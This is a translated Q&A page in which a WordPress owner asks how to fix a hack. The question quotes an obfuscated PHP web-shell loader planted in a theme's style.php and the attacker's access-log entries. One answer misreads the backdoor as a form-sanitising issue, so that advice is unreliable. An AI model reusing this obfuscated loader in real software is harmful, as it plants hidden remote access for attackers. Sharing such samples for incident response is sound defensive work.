Wordpress漏洞问题

时间:2017-05-24 17:42:10

标签: php wordpress security

我的wordpress网站刚遭到黑客入侵,在查看日志后我看到他们利用了这个文件:www / wp-content / themes / mytheme / style.php

当浏览此链接www.mywebsite.com/wp-content/themes/mytheme/style.php时,我找到一个带按钮的输入字段。所以我猜他们上传了他们的shell脚本。

function pre_term_name( $wp_kses_data, $wp_nonce ) {
$kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data );
$filter = base64_decode( $kses_str );
$md5 = strrev( $wp_nonce );
$sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) );
$wp_nonce = md5( $wp_nonce ). $sub;
$preparefunc = 'gzinflate';
$i = 0; do {
    $ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );
    $filter[$i] = chr( $ord % 256 );
    $wp_nonce .= $filter[$i]; $i++;
} while ($i < strlen( $filter ));
return @$preparefunc( $filter );
} 

$wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= "&gt;"/></form>';

如何解决此漏洞?谢谢

日志:

195.211.142.36 - - [19/May/2017:19:00:17 +0100] "POST /wp-content/themes/mytheme/style.php HTTP/1.1" 301 - "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:18 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 123 "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:27 +0100] "GET /TEST777/system.php?ar=test333.zip HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:33 +0100] "GET /TEST777/test111 HTTP/1.1" 200 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:40 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 7680 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"

2 个答案:

答案 0 :(得分:0)

该行是输入的位置。该漏洞将是发布到的任何内容。似乎该操作是空白的,因此我假设有一个jQuery / AJAX调用正在停止提交并传递数据。这将是在哪里检查。从那里,您将知道实际发布数据的位置以及正在执行的查询。检查查询是否正在使用PDO和/或输入是否已清理。

作为一名将军&#34;帮助者&#34;虽然有WP安全性,但我喜欢Sucuri WP插件。

答案 1 :(得分:-1)

您可以使用WordPress安全插件,例如:WordFence,BulletProof Security,Sucuri Security,iThemes Security,Acunetix WP SecurityScan

和 查看此页面:threats

Security Vulnerabilities

相关问题
最新问题